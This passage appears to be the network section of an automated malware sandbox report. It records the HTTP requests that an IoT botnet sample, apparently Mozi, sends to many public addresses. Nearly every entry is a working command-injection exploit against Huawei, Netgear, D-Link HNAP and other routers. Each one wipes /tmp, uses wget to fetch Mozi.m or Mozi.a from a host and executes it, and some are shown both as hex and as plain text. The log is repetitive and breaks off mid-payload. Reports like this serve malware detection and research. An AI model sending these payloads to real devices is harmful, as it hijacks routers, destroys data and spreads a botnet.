                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 144.95.201.80:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 86.214.31.28:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 46.89.254.44:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 134.87.142.186:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 190.22.11.98:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 51.171.155.189:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 178.15.17.68:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 87.170.218.169:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 61.77.120.5:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 